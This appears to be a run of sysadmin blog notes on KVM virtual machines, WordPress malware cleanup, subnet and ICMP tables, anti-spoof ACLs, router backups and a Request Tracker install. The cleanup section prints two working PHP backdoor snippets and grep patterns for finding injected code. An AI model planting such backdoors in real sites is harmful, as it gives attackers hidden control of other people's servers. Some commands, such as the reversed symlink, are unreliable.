<interface type='network'>
<mac address='52:54:00:f9:b7:7f'/>
<source network='br0'/>
<model type='virtio'/>
<address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
</interface>
virsh # start Cent7Test
virsh # dominfo Cent7Test
Id: 5
Name: Cent7Test
UUID: 17a23e76-ecf6-e0b6-f0d2-7c249d95b862
OS Type: hvm
State: running
CPU(s): 1
CPU time: 24.9s
Max memory: 1048576 KiB
Used memory: 1048576 KiB
Persistent: yes
Autostart: disable
Managed save: no
Security model: apparmor
Security DOI: 0
Security label: libvirt-17a23e76-ecf6-e0b6-f0d2-7c249d95b862 (enforcing)
list all domain virtual interfaces
virsh # domiflist Centos7
Interface Type Source Model MAC
-------------------------------------------------------
vnet1 bridge br0 virtio 52:54:00:e3:b5:20
get network interface stats for a domain
virsh # domifstat Centos7 vnet1
vnet1 rx_bytes 27319
vnet1 rx_packets 333
vnet1 rx_errs 0
vnet1 rx_drop 0
vnet1 tx_bytes 4677
vnet1 tx_packets 30
vnet1 tx_errs 0
vnet1 tx_drop 0
find . -name "*.php" | xargs grep "gzinflate(base64_decode"
Basically, there’s malicious code inserted at the beginning of the PHP script, base64 encoded and compressed, so if you look at the file the first line looks like garbage. There’s a backdoor on the system that keeps it coming back. I remove it with the following one-liner:
find -name "*.php" -exec sed -i '/<?.*eval(gzinflate(base64.*?>/ d' '{}' \; -print
Here’s the code uncompressed and decoded:
Another issue is with the .htaccess files being written to. I search for all of the .htaccess files and check for strings known to me that are not supposed to be there.
find . -name "*.htaccess" | xargs grep "windows-media-player"
find . -name "*.htaccess" | xargs grep "moby"
find . -name "*.htaccess" | xargs grep "click"
The SEO spam was primarily being generated from a forum directory that was created. This is what most concerns me, so instead of removing the forum directory, only to have it put back by a back door, I changed the permissions on the directory to 000: not readable, not writable and not executable for user, group and world. I also changed the ownership to root and the group to root so that the webserver can’t write over it or recreate it. It also returns a 403 Permission denied when someone tries to access it.
find . -name "forum" | xargs ls -la
./wordpress/domain-one.com/htdocs/forum:
total 20
d--------- 2 root root 4096 Mar 13 13:19 .
drwxr-xr-x 6 www-data www-data 4096 Mar 13 13:19 ..
-rwxr-xr-x 1 root root 84 Mar 4 14:47 .htaccess
-rwxr-xr-x 1 root root 4993 Mar 13 13:19 post.php
I’m computing MD5 hashes of a clean install of WordPress and comparing them to the equivalent files on the server. This one-liner does it for all files in a directory.
for file in *; do md5sum $file; done
I found another malicious file called sopka.php
root@bserver:/var/www/wordpress# locate sopka.php | xargs md5sum
3800aa78d035d209cfaf64206cdcee6d /var/www/wordpress/domain-one.com/htdocs/sopka.php
3800aa78d035d209cfaf64206cdcee6d /var/www/wordpress/domaon-two.com/htdocs/sopka.php
3800aa78d035d209cfaf64206cdcee6d /var/www/wordpress/domain-three.com/htdocs/sopka.php
3800aa78d035d209cfaf64206cdcee6d /var/www/wordpress/domain-four.com/htdocs/sopka.php
I chmod’d them all 000, this is the contents:
There are also these malicious files, called sidebar.php and footer.php; I chmod’d them all to 000.
locate sidebar.php | xargs grep bwinpoker
locate footer.php | xargs grep bwinpoker
Here are the backdoors:
<? php if(@md5($_SERVER['HTTP_PATH'])==='5cd2973f835de94b560b62465d5a37f3'){ @extract($_REQUEST); @die($stime($mtime)); } ?>
And
<?php add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt")))))); ?>
Netmask          Netmask (binary)                     CIDR  Notes
_____________________________________________________________________________
255.255.255.255  11111111.11111111.11111111.11111111  /32   Host (single addr)
255.255.255.254  11111111.11111111.11111111.11111110  /31   Unusable
255.255.255.252  11111111.11111111.11111111.11111100  /30   2 usable
255.255.255.248  11111111.11111111.11111111.11111000  /29   6 usable
255.255.255.240  11111111.11111111.11111111.11110000  /28   14 usable
255.255.255.224  11111111.11111111.11111111.11100000  /27   30 usable
255.255.255.192  11111111.11111111.11111111.11000000  /26   62 usable
255.255.255.128  11111111.11111111.11111111.10000000  /25   126 usable
255.255.255.0    11111111.11111111.11111111.00000000  /24   "Class C" 254 usable
255.255.254.0    11111111.11111111.11111110.00000000  /23   2 Class C's
255.255.252.0    11111111.11111111.11111100.00000000  /22   4 Class C's
255.255.248.0    11111111.11111111.11111000.00000000  /21   8 Class C's
255.255.240.0    11111111.11111111.11110000.00000000  /20   16 Class C's
255.255.224.0    11111111.11111111.11100000.00000000  /19   32 Class C's
255.255.192.0    11111111.11111111.11000000.00000000  /18   64 Class C's
255.255.128.0    11111111.11111111.10000000.00000000  /17   128 Class C's
255.255.0.0      11111111.11111111.00000000.00000000  /16   "Class B"
255.254.0.0      11111111.11111110.00000000.00000000  /15   2 Class B's
255.252.0.0      11111111.11111100.00000000.00000000  /14   4 Class B's
255.248.0.0      11111111.11111000.00000000.00000000  /13   8 Class B's
255.240.0.0      11111111.11110000.00000000.00000000  /12   16 Class B's
255.224.0.0      11111111.11100000.00000000.00000000  /11   32 Class B's
255.192.0.0      11111111.11000000.00000000.00000000  /10   64 Class B's
255.128.0.0      11111111.10000000.00000000.00000000  /9    128 Class B's
255.0.0.0        11111111.00000000.00000000.00000000  /8    "Class A"
254.0.0.0        11111110.00000000.00000000.00000000  /7
252.0.0.0        11111100.00000000.00000000.00000000  /6
248.0.0.0        11111000.00000000.00000000.00000000  /5
240.0.0.0        11110000.00000000.00000000.00000000  /4
224.0.0.0        11100000.00000000.00000000.00000000  /3
192.0.0.0        11000000.00000000.00000000.00000000  /2
128.0.0.0        10000000.00000000.00000000.00000000  /1
0.0.0.0          00000000.00000000.00000000.00000000  /0    IP space
                                       Net   Host   Total
      Net Addr                         Addr  Addr   Number
Class Range      NetMask               Bits  Bits   of hosts
----------------------------------------------------------
A     0-127      255.0.0.0             8     24     16777216  (i.e. 114.0.0.0)
B     128-191    255.255.0.0           16    16     65536     (i.e. 150.0.0.0)
C     192-254    255.255.255.0         24    8      256       (i.e. 199.0.0.0)
D     224-239    (multicast)
E     240-255    (reserved)
F     208-215    255.255.255.240       28    4      16
G     216/8      ARIN - North America
G     217/8      RIPE NCC - Europe
G     218-219/8  APNIC
H     220-221    255.255.255.248       29    3      8         (reserved)
K     222-223    255.255.255.254       31    1      2         (reserved)
(ref: RFC1375 & http://www.iana.org/assignments/ipv4-address-space )
( http://www.iana.org/numbers.htm )
----------------------------------------------------------
The current list of special use prefixes:
0.0.0.0/8
127.0.0.0/8
192.0.2.0/24
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
169.254.0.0/16
all D/E space
(ref: RFC1918 http://www.rfc-editor.org/rfc/rfc1918.txt )
( or ftp://ftp.isi.edu/in-notes/rfc1918.txt )
(rfc search: http://www.rfc-editor.org/rfcsearch.html )
( http://www.ietf.org/ietf/1id-abstracts.txt )
( http://www.ietf.org/shadow.html )
Martians: (updates at: www.iana.org/assignments/ipv4-address-space )
no ip source-route
access-list 100 deny ip host 0.0.0.0 any
deny ip 0.0.0.0 0.255.255.255 any log ! antispoof
deny ip 0.0.0.0 0.255.255.255 0.0.0.0 255.255.255.255 ! antispoof
deny ip any 255.255.255.128 0.0.0.127 ! antispoof
deny ip host 0.0.0.0 any log ! antispoof
deny ip host [router intf] [router intf] ! antispoof
deny ip xxx.xxx.xxx.0 0.0.0.255 any log ! lan area
deny ip 0/8 0.255.255.255 any log ! IANA - Reserved
deny ip 1/8 0.255.255.255 any log ! IANA - Reserved
deny ip 2/8 0.255.255.255 any log ! IANA - Reserved
deny ip 5/8 0.255.255.255 any log ! IANA - Reserved
deny ip 7/8 0.255.255.255 any log ! IANA - Reserved
deny ip 10.0.0.0 0.255.255.255 any log ! IANA - Private Use
deny ip 23/8 0.255.255.255 any log ! IANA - Reserved
deny ip 27/8 0.255.255.255 any log ! IANA - Reserved
deny ip 31/8 0.255.255.255 any log ! IANA - Reserved
deny ip 36-37/8 0.255.255.255 any log ! IANA - Reserved
deny ip 39/8 0.255.255.255 any log ! IANA - Reserved
deny ip 41-42/8 0.255.255.255 any log ! IANA - Reserved
deny ip 50/8 0.255.255.255 any log ! IANA - Reserved
deny ip 58-60/8 0.255.255.255 any log ! IANA - Reserved
deny ip 69-79/8 0.255.255.255 any log ! IANA - Reserved
deny ip 82-95/8 0.255.255.255 any log ! IANA - Reserved
deny ip 96-126/8 0.255.255.255 any log ! IANA - Reserved
deny ip 127/8 0.255.255.255 any log ! IANA - Reserved
deny ip 169.254.0.0 0.0.255.255 any log ! link-local network
deny ip 172.16.0.0 0.15.255.255 any log ! reserved
deny ip 192.168.0.0 0.0.255.255 any log ! reserved
deny ip 192.0.2.0 0.0.0.255 any log ! test network
deny ip 197/8 0.255.255.255 any log ! IANA - Reserved
deny ip 220/8 0.255.255.255 any log ! IANA - Reserved
deny ip 222-223/8 0.255.255.255 any log ! IANA - Reserved
deny ip 224.0.0.0 31.255.255.255 any log ! multicast
deny ip 224.0.0.0 15.255.255.255 any log ! unless MBGP-learned routes
deny ip 224-239/8 0.255.255.255 any log ! IANA - Multicast
deny ip 240-255/8 0.255.255.255 any log ! IANA - Reserved
filtered source addresses
0/8 ! broadcast
10/8 ! RFC 1918 private
127/8 ! loopback
169.254.0/16 ! link local
172.16.0.0/12 ! RFC 1918 private
192.0.2.0/24 ! TEST-NET
192.168.0/16 ! RFC 1918 private
224.0.0.0/4 ! class D multicast
240.0.0.0/5 ! class E reserved
248.0.0.0/5 ! reserved
255.255.255.255/32 ! broadcast
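An added example, not part of the original cheat sheet, that turns the filtered-source list above into a check: it decides whether a source address falls inside any of those special-use (martian) prefixes and flags matching netfilter log lines, the test an ingress anti-spoof filter performs. It assumes a POSIX sh with 64-bit arithmetic (dash or bash on a 64-bit Linux host); the log lines in SAMPLE_LOG are constructed, not real captures.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: test source
# addresses against the special-use ("martian") prefixes listed above,
# as an ingress anti-spoof filter would.

# ip2int A.B.C.D -> the address as an unsigned 32-bit integer
ip2int() {
    set -- $(printf '%s\n' "$1" | tr '.' ' ')
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# in_prefix ADDR NET/LEN -> exit status 0 if ADDR lies inside the prefix
in_prefix() {
    net=${2%/*}
    len=${2#*/}
    # 4294967295 is 0xFFFFFFFF; shift left then truncate back to 32 bits
    mask=$(( (4294967295 << (32 - len)) & 4294967295 ))
    [ $(( $(ip2int "$1") & mask )) -eq $(( $(ip2int "$net") & mask )) ]
}

# The filtered source prefixes from the list above. 240.0.0.0/4 covers
# 248.0.0.0/5 and the 255.255.255.255/32 broadcast address as well.
MARTIANS="0.0.0.0/8 10.0.0.0/8 127.0.0.0/8 169.254.0.0/16 172.16.0.0/12
          192.0.2.0/24 192.168.0.0/16 224.0.0.0/4 240.0.0.0/4"

# martian_prefix ADDR -> prints the first matching prefix and returns 0;
# returns 1 and prints nothing for a source that is not in the list
martian_prefix() {
    for p in $MARTIANS; do
        if in_prefix "$1" "$p"; then
            echo "$p"
            return 0
        fi
    done
    return 1
}

# flag_spoofed: reads netfilter log lines on stdin and prints
# "SPOOFED <src> (<prefix>)" for each line whose SRC= address is martian
flag_spoofed() {
    while read -r line; do
        case $line in
            *SRC=*) ;;
            *) continue ;;
        esac
        src=${line##*SRC=}   # drop everything up to SRC=
        src=${src%% *}       # keep only the address
        if p=$(martian_prefix "$src"); then
            echo "SPOOFED $src ($p)"
        fi
    done
}

# Constructed sample log lines (not real captures) for a stand-alone run:
# an RFC 1918 source and a TEST-NET source arriving on the outside interface
SAMPLE_LOG='kernel: IN=ens160 OUT= SRC=10.20.30.99 DST=203.0.113.5 PROTO=TCP DPT=80
kernel: IN=ens160 OUT= SRC=203.0.113.7 DST=203.0.113.5 PROTO=TCP DPT=22
kernel: IN=ens160 OUT= SRC=192.0.2.44 DST=203.0.113.5 PROTO=UDP DPT=53'

# flag_sample -> the SPOOFED lines for SAMPLE_LOG
flag_sample() {
    printf '%s\n' "$SAMPLE_LOG" | flag_spoofed
}

flag_sample
```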
ARIN administrated blocks: (http://www.arin.net/regserv/IPStats.html)
----------------------------------------------------------
well known ports: (rfc1700.txt)
www.iana.org/assignments/port-numbers
protocol numbers:
www.iana.org/assignments/protocol-numbers
www.iana.org/numbers.htm
ICMP(Types/Codes)
Testing Destination Reachability & Status
(0/0) Echo-Reply
(8/0) Echo
Unreachable Destinations
(3/0) Network Unreachable
(3/1) Host Unreachable
(3/2) Protocol Unreachable
(3/3) Port Unreachable
(3/4) Fragmentation Needed and DF set (Pkt too big)
(3/5) Source Route Failed
(3/6) Network Unknown
(3/7) Host Unknown
(3/9) DOD Net Prohibited
(3/10) DOD Host Prohibited
(3/11) Net TOS Unreachable
(3/12) Host TOS Unreachable
(3/13) Administratively Prohibited
(3/14) Host Precedence Unreachable
(3/15) Precedence Unreachable
Flow Control
(4/0) Source-Quench [RFC 1016]
Route Change Requests from Gateways
(5/0) Redirect Datagrams for the Net
(5/1) Redirect Datagrams for the Host
(5/2) Redirect Datagrams for the TOS and Net
(5/3) Redirect Datagrams for the TOS and Host
Router
(6/-) Alternate-Address
(9/0) Router-Advertisement
(10/0) Router-Solicitation
Detecting Circular or Excessively Long Routes
(11/0) Time to Live Count Exceeded
(11/1) Fragment Reassembly Time Exceeded
Reporting Incorrect Datagram Headers
(12/0) Parameter-Problem
(12/1) Option Missing
(12/2) No Room for Option
Clock Synchronization and Transit Time Estimation
(13/0) Timestamp-Request
(14/0) Timestamp-Reply
Obtaining a Network Address (RARP Alternative)
(15/0) Information-Request
(16/0) Information-Reply
Obtaining a Subnet Mask [RFC 950]
(17/0) Address Mask-Request
(18/0) Address Mask-Reply
Other
(30/0) Traceroute
(31/0) Conversion-Error
(32/0) Mobile-Redirect
root@kvm:/var/lib/libvirt/images/iso# virt-install -n Kali -r 2048 \
--disk path=/var/lib/libvirt/images/Kali.qcow2,bus=virtio,size=50,format=qcow2 \
-c /var/lib/libvirt/images/iso/kali-linux-1.0.9a-amd64.iso \
--network network=default,model=virtio --connect=qemu:///system --vnc \
--noautoconsole --hvm --video=vmvga --os-type=linux --os-variant=debianwheezy
Starting install...
Allocating 'Kali.qcow2' | 50 GB 00:00
Creating domain... | 0 B 00:00
Domain installation still in progress. You can reconnect to
the console to complete the installation process.
Now Connect with your VNC client.
I had problems with booting into graphical mode because of my old system, so I booted into single user mode. From single user mode I added the chkconfig program and disabled gdm3 from starting. I also created a symlink from /usr/sbin/gdm3 to /usr/bin/startx, so now it’s like the old BackTrack where you log in to the console and only start up X if you need it.
apt-get install chkconfig -y
ln -s /usr/sbin/gdm3 /usr/bin/startx
chkconfig -l
chkconfig --del gdm3
reboot
Now you can update and upgrade:
apt-get update
apt-get upgrade
Install htop and nethogs. htop shows running processes and memory used, including many more details (you could use the top command, but htop is just more useful). NetHogs shows traffic used by applications per interface. Install them using the following command:
apt-get install htop nethogs -y
You can now run them using the following commands:
htop
nethogs eth0
nethogs wlan0
Fix the graphics if vmvga didn’t work; in my case the default cirrus needed to be changed.
virsh dumpxml Kali > /tmp/Kali.xml
vi /tmp/Kali.xml
Change cirrus to vmvga
virsh define /tmp/Kali.xml
Domain Kali defined from /tmp/Kali.xml
tom@kvm:~$ virsh start Kali
Domain Kali started
#!/bin/bash
# MikroTik backup: one subdirectory per router under $base, named after the
# router's hostname. Each run saves a binary backup and an exported .rsc
# config on the router, copies both down, then deletes them from the router.
# Weekly copies are kept 30 days, daily copies 7 days; monthly copies are kept.
base=/home/backups/mikrotik/hosts
dow=$(date "+%w")
dom=$(date "+%d")
today=$(date "+%Y-%m-%d")
if [ "$dom" = "01" ]; then
    backup_file="$today.monthly"
elif [ "$dow" = "0" ]; then
    backup_file="$today.weekly"
else
    backup_file="$today.daily"
fi
# Prune old copies before fetching new ones
find "$base" -mtime +30 -name "*weekly*" -exec rm {} \;
find "$base" -mtime +7 -name "*daily*" -exec rm {} \;
cd "$base" || exit 1
for host in *; do
    [ -d "$host" ] || continue
    echo "backing up $host"
    ssh -n "admin-ssh@$host" "/system backup save name=$backup_file" > /dev/null
    ssh -n "admin-ssh@$host" "/export file=$backup_file" > /dev/null
    scp "admin-ssh@$host:$backup_file.backup" "$base/$host/" > /dev/null
    scp "admin-ssh@$host:$backup_file.rsc" "$base/$host/" > /dev/null
    # Remove the copies left on the router
    echo "rm $backup_file.backup" | sftp "admin-ssh@$host" &> /dev/null
    echo "rm $backup_file.rsc" | sftp "admin-ssh@$host" &> /dev/null
done
If you’re not familiar with RT, the first release was in 1996 and it was written by Jesse Vincent. RT is an issue ticket request tracker which began with an email interface and a tcl/tk interface. Now there is a web interface. The web interface isn’t the best, but the latest version (4.2) is much better looking than the releases of the past. I wish they would just Twitter Bootstrap the whole thing and not bother or worry about the css.
The web interface is really for the help desk, not the ticket requestors. The ticket requests will continue to be primarily entered by sending email to the system.
I’m building this as a KVM domain so let’s get started and clone the Ubuntu 14.04 gold master. Again, I realize I should be doing this in a devops-y way, but the install still needs to be documented before I can automate it. Also, I don’t want to use the package manager to install RT because I want the latest version.
virt-clone --connect=qemu:///system -o UbuntuServer1404 -n RT -f RT.qcow2
Login to the system when it comes up, become root with “sudo -i” and edit the following files to change the hostname to rt:
vi /etc/hostname
vi /etc/hosts
Now reboot, login again, become root and update the system and reboot:
sudo -i
apt-get update
apt-get upgrade
reboot
Login again, become root and cd into /usr/local/src. Download the latest version of RT from the author’s website, Best Practical. Gunzip and extract the tar file, cd into the newly created directory.
cd /usr/local/src
wget https://download.bestpractical.com/pub/rt/release/rt.tar.gz
gunzip rt.tar.gz
tar -xvf rt.tar
I’ve already gone through and figured out the package dependencies:
apt-get install build-essential mysql-server apache2 postfix mailutils openssl libyaml libyaml-appconfig-perl openssl-dev libexpat1-dev
Now let’s see what’s missing:
./configure
make testdeps
Configure CPAN
/usr/bin/perl -MCPAN -e shell
‘make fixdeps’ will install all the CPAN modules:
make fixdeps
Test again to see that all dependencies have been met:
make testdeps
Once you have met the dependencies you can install RT:
make install
Then
make initialize-database
Now comes the tricky part. First add mod_fastcgi:
apt-get install libapache2-mod-fastcgi
a2enmod fastcgi
apache2ctl graceful
Create the Request Tracker apache conf; you can copy and paste this into your terminal and hit ctrl-d to save. This is the trick: the example on the RT website is incorrect. Notice I’ve commented out Order and Allow and added the Require statement.
cat > /etc/apache2/sites-available/request-tracker.conf
# Tell FastCGI to put its temporary files somewhere sane; this may
# be necessary if your distribution doesn't already set it
#FastCgiIpcDir /tmp
FastCgiServer /opt/rt4/sbin/rt-server.fcgi -processes 5 -idle-timeout 300
<VirtualHost rt.thunderhouse.com>
### Optional apache logs for RT
# Ensure that your log rotation scripts know about these files
# ErrorLog /opt/rt4/var/log/apache2.error
# TransferLog /opt/rt4/var/log/apache2.access
# LogLevel debug
AddDefaultCharset UTF-8
ScriptAlias / /opt/rt4/sbin/rt-server.fcgi/
DocumentRoot "/opt/rt4/share/html"
<Location />
#Order allow,deny
#Allow from all
Require all granted
Options +ExecCGI
AddHandler fastcgi-script fcgi
</Location>
</VirtualHost>
Enable it:
a2ensite request-tracker.conf
Restart apache:
apachectl restart
Hit the server with a browser and you should be on your way. The default account is root/password.
root@kvm:~# virt-install --os-variant list
win7 : Microsoft Windows 7
vista : Microsoft Windows Vista
winxp64 : Microsoft Windows XP (x86_64)
winxp : Microsoft Windows XP
win2k : Microsoft Windows 2000
win2k8 : Microsoft Windows Server 2008
win2k3 : Microsoft Windows Server 2003
openbsd4 : OpenBSD 4.x
freebsd8 : FreeBSD 8.x
freebsd7 : FreeBSD 7.x
freebsd6 : FreeBSD 6.x
solaris9 : Sun Solaris 9
solaris10 : Sun Solaris 10
opensolaris : Sun OpenSolaris
netware6 : Novell Netware 6
netware5 : Novell Netware 5
netware4 : Novell Netware 4
msdos : MS-DOS
generic : Generic
debianwheezy : Debian Wheezy
debiansqueeze : Debian Squeeze
debianlenny : Debian Lenny
debianetch : Debian Etch
fedora18 : Fedora 18
fedora17 : Fedora 17
fedora16 : Fedora 16
fedora15 : Fedora 15
fedora14 : Fedora 14
fedora13 : Fedora 13
fedora12 : Fedora 12
fedora11 : Fedora 11
fedora10 : Fedora 10
fedora9 : Fedora 9
fedora8 : Fedora 8
fedora7 : Fedora 7
fedora6 : Fedora Core 6
fedora5 : Fedora Core 5
mageia1 : Mageia 1 and later
mes5.1 : Mandriva Enterprise Server 5.1 and later
mes5 : Mandriva Enterprise Server 5.0
mandriva2010 : Mandriva Linux 2010 and later
mandriva2009 : Mandriva Linux 2009 and earlier
rhel7 : Red Hat Enterprise Linux 7
rhel6 : Red Hat Enterprise Linux 6
rhel5.4 : Red Hat Enterprise Linux 5.4 or later
rhel5 : Red Hat Enterprise Linux 5
rhel4 : Red Hat Enterprise Linux 4
rhel3 : Red Hat Enterprise Linux 3
rhel2.1 : Red Hat Enterprise Linux 2.1
sles11 : Suse Linux Enterprise Server 11
sles10 : Suse Linux Enterprise Server
opensuse12 : openSuse 12
opensuse11 : openSuse 11
ubuntutrusty : Ubuntu 14.04 LTS (Trusty Tahr)
ubuntusaucy : Ubuntu 13.10 (Saucy Salamander)
ubunturaring : Ubuntu 13.04 (Raring Ringtail)
ubuntuquantal : Ubuntu 12.10 (Quantal Quetzal)
ubuntuprecise : Ubuntu 12.04 LTS (Precise Pangolin)
ubuntuoneiric : Ubuntu 11.10 (Oneiric Ocelot)
ubuntunatty : Ubuntu 11.04 (Natty Narwhal)
ubuntumaverick : Ubuntu 10.10 (Maverick Meerkat)
ubuntulucid : Ubuntu 10.04 LTS (Lucid Lynx)
ubuntukarmic : Ubuntu 9.10 (Karmic Koala)
ubuntujaunty : Ubuntu 9.04 (Jaunty Jackalope)
ubuntuintrepid : Ubuntu 8.10 (Intrepid Ibex)
ubuntuhardy : Ubuntu 8.04 LTS (Hardy Heron)
virtio26 : Generic 2.6.25 or later kernel with virtio
generic26 : Generic 2.6.x kernel
generic24 : Generic 2.4.x kernel
root@kvm:/var/lib/libvirt/images# virt-install -n Gold-Win7 -r 1024 \
--disk path=/var/lib/libvirt/images/Gold-Win7.qcow2,size=40,format=qcow2 \
-c /var/lib/libvirt/images/iso/7600.16385.090713-1255_x64fre_enterprise_en-us_EVAL_Eval_Enterprise-GRMCENXEVAL_EN_DVD.iso \
--accelerate --network network=default --connect=qemu:///system --vnc \
--noautoconsole -v --os-type=windows --os-variant=win7
Starting install...
Allocating 'Gold-Win7.qcow2' | 40 GB 00:00
Creating domain... | 0 B 00:01
Domain installation still in progress. Waiting for installation to complete.
root@kvm:/var/lib/libvirt/images# virt-install -n Gold-WinXP -r 512 \
--disk path=/var/lib/libvirt/images/Gold-WinXP.qcow2,size=40,format=qcow2 \
-c /var/lib/libvirt/images/iso/WinXP-oem.iso --accelerate \
--network network=default \
--connect=qemu:///system --vnc --noautoconsole -v \
--os-type=windows --os-variant=winxp
Quick format
Default install
Activate it when it asks
Download SP3 to your desktop (not the vm)
Put it in the Sites folder and make sure it’s world readable
Hit it with ie in the virtual machine
Run from location
Install SP3 and reboot
Now you can go ahead and install all the updates
From here, I’m going to shut down the vm and clone it, but I might have to reactivate it. To avoid this I’m going to copy C:\WINDOWS\SYSTEM32\WPA.DBL to the desktop. If I have to reactivate then I’ll just copy this file back. Start -> Run
copy C:\WINDOWS\SYSTEM32\WPA.DBL Desktop
Turn off the virtual machine
Clone the Gold Master image, it’ll look like it’s going to take an hour but it won’t:
root@kvm:/var/lib/libvirt/images# virt-clone --connect=qemu:///system -o Gold-WinXP \
-n WinXP -f WinXP.qcow2
Allocating 'WinXP.qcow2' | 40 GB 03:53
Clone 'WinXP' created successfully.
Turn it back on:
virsh # start WinXP
Domain WinXP started
Connect to it with your vnc client, I use chicken. The cloned image is usable and activated, which I didn’t think it would be. VMware usually complains if you move/clone/copy an image and then you have to sysprep and reactivate.
First let’s get in virsh and shutdown the domain:
root@kvm:~# virsh
virsh # shutdown WinXP
Domain WinXP is being shutdown
Now make sure it isn’t running:
virsh # list --all
Id Name State
----------------------------------------------------
2 Ansible running
4 piaf running
14 Win81 running
15 OpenVPN running
- WinXP shut off
If the vm is still running and is stuck, use “destroy” instead of shutdown in the command above and check it again with “list --all”
Two things need to happen next, the guest needs to be taken out of the kvm xml configuration and then the files need to be removed from the filesystem.
1) First let’s undefine the guest domain:
virsh # undefine WinXP
Domain WinXP has been undefined
2) Now let’s remove the disk image from the pool:
virsh # vol-delete --pool default WinXP.img
Vol WinXP.img deleted
Now download the fedora storage drivers from the kvm site
tom@kvm:~$ wget http://alt.fedoraproject.org/pub/alt/virtio-win/latest/images/virtio-win-0.1-81.iso
--2014-11-14 13:22:18-- http://alt.fedoraproject.org/pub/alt/virtio-win/latest/images/virtio-win-0.1-81.iso
Resolving alt.fedoraproject.org (alt.fedoraproject.org)... 209.132.181.24, 209.132.181.25, 209.132.181.26, ...
Connecting to alt.fedoraproject.org (alt.fedoraproject.org)|209.132.181.24|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 74143744 (71M) [application/octet-stream]
Saving to: ‘virtio-win-0.1-81.iso’
100%[==========================================================>] 74,143,744 429KB/s in 2m 49s
2014-11-14 13:25:08 (429 KB/s) - ‘virtio-win-0.1-81.iso’ saved [74143744/74143744]
Now move it into place:
tom@kvm:~$ sudo mv virtio-win-0.1-81.iso /var/lib/libvirt/images/
Transfer the iso to the kvm host and put it in /var/lib/libvirt/images
Create the virtual machine
root@kvm:/var/lib/libvirt/images# virt-install -n Win81 -r 2048 --disk path=/var/lib/libvirt/images/Win81.qcow2,bus=virtio,size=40,format=qcow2 -c /var/lib/libvirt/images/9600.17050.WINBLUE_REFRESH.140317-1640_X64FRE_ENTERPRISE_EVAL_EN-US-IR3_CENA_X64FREE_EN-US_DV9.ISO --accelerate --network network=default,model=virtio --connect=qemu:///system --vnc --noautoconsole -v --os-type=windows --os-variant=win7
Starting install...
Allocating 'Win81.qcow2' | 40 GB 00:00
Creating domain... | 0 B 00:01
Domain installation still in progress. Waiting for installation to complete.
When the install gets stuck on the storage page, eject the windows 8.1 install dvd and insert the driver iso:
virsh # domblklist Win81
Target Source
------------------------------------------------
vda /var/lib/libvirt/images/Win81.qcow2
hdc /var/lib/libvirt/images/9600.17050.WINBLUE_REFRESH.140317-1640_X64FRE_ENTERPRISE_EVAL_EN-US-IR3_CENA_X64FREE_EN-US_DV9.ISO
virsh # change-media Win81 hdc --eject
succeeded to complete action eject on media
virsh # change-media Win81 hdc /var/lib/libvirt/images/virtio-win-0.1-81.iso --insert
succeeded to complete action insert on media
You’ll see three drivers, a network driver, a scsi driver and a balloon driver, choose the scsi driver.
Now you’ll have to put the install disk back in:
virsh # change-media Win81 hdc /var/lib/libvirt/images/virtio-win-0.1-81.iso --eject
succeeded to complete action eject on media
virsh # change-media Win81 hdc /var/lib/libvirt/images/9600.17050.WINBLUE_REFRESH.140317-1640_X64FRE_ENTERPRISE_EVAL_EN-US-IR3_CENA_X64FREE_EN-US_DV9.ISO --insert
succeeded to complete action insert on media
To update the network driver, change the cdrom again:
virsh # change-media Win81 hdc --eject
succeeded to complete action eject on media
virsh # change-media Win81 hdc /var/lib/libvirt/images/virtio-win-0.1-81.iso --insert
succeeded to complete action insert on media
Choose the Red Hat Virtio Ethernet Adapter driver and PCI Adapter (Balloon Driver)
root@kvm:~# virt-install -n CentOS65 -r 1024 \
--disk path=/var/lib/libvirt/images/CentOS65.qcow2,bus=virtio,size=10,format=qcow2 \
-c /var/lib/libvirt/images/CentOS-6.5-x86_64-minimal.iso \
--accelerate --network network=default,model=virtio \
--connect=qemu:///system --vnc --noautoconsole -v \
--os-type=linux --os-variant=rhel6
Starting install...
Allocating 'CentOS65.qcow2' | 10 GB 00:00
Creating domain... | 0 B 00:00
Domain installation still in progress. You can reconnect to
the console to complete the installation process.
root@kvm:/var/lib/libvirt/images# virt-clone --connect=qemu:///system -o CentOS65 -n piaf -f piaf.qcow2
Allocating 'piaf.qcow2' | 10 GB 00:02
Clone 'piaf' created successfully.
virsh # start piaf
Domain piaf started
Change into the network-scripts directory
cd /etc/sysconfig/network-scripts
Generate a new uuid for the network interface and append it to the ifcfg-eth0 file
uuidgen >> ifcfg-eth0
Get the mac address of eth1
ifconfig -a
Edit the ifcfg-eth0 file
vi ifcfg-eth0
1. fix the uuid
2. fix the mac address
3. change ONBOOT to yes
Remove 70-persistent-net.rules, it will be regenerated automatically
rm -f /etc/udev/rules.d/70-persistent-net.rules
Change the hostname
vi /etc/sysconfig/network
Reboot the VM
reboot
Log back in and run a yum update
yum update
Reboot
Get the piaf3-install script and run it.